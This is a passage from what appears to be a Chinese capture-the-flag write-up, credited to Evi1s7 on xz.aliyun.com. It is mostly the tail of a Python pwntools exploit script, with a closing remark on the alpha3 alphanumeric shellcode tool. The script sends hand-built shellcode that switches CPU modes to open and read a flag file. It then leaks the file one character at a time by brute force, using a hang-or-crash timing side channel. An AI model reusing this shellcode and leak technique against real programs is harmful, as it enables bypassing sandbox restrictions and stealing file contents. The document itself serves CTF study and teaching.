115.     shellcode3 = "\x49\xba\x00\x00\x00\x00\x23\x00\x00\x00\x48\x83\xc6\x13\x4c\x01\xd6\x56\xcb\xbc\x00\x04\x00\x40\x6a\x67\x68\x2f\x66\x6c\x61\x89\xe3\x31\xc9\xba\x07\x00\x00\x00\xb8\x05\x00\x00\x00\xcd\x80\x6a\x33\x68\x37\x00\x00\x40\xcb\x48\x89\xc7\x48\xc7\xc6\x00\x05\x00\x40\x48\xc7\xc2\x80\x00\x00\x00\x48\x31\xc0\x0f\x05\x6a\x00"
     
116.     shellcode3 += asm('cmp byte ptr[rsi+{0}],{1};jz $-3;ret'.format(a,b) if a == 0 else 'cmp byte ptr[rsi+{0}],{1};jz $-4;ret'.format(a,b),arch='amd64')
     
117.     p.sendline(shellcode1)
     
118.     p.sendline(shellcode2)
     
119.     # raw_input()
     
120.     p.sendline(shellcode3)
     
121.     try:
     
122.         p.recv(timeout = 2)
     
123.     except:
     
124.         p.close()
     
125.         return 0
     
126.     else:
     
127.         return 1
     
128. def main():
     
129.     flag = [" " for _ in range(0x30)]
     
130.     for i in range(0,100):
     
131.         # for char in "{}1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
     
132.         for char in range(0x20,0x7e+1):
     
133.             # char = ord(char)
     
134.             p = process("./shellcode")
     
135.             if exp(p,i,char):
     
136.                 flag[i] = chr(char)
     
137.                 tmp = "".join(_ for _ in flag)
     
138.                 print(">>>>> %s"%tmp)
     
139.                 break
     
140.             p.close()
     
141. if __name__ == '__main__':
     
142.     main()

复制代码

这里涉及到一个工具alpha3,可以生成纯字符的shellcode，具体使用以及安装可以借鉴下面参考中给出的链接，这个师傅整理的非常方便了

来源：【https://xz.aliyun.com/】，感谢【Evi1s7 】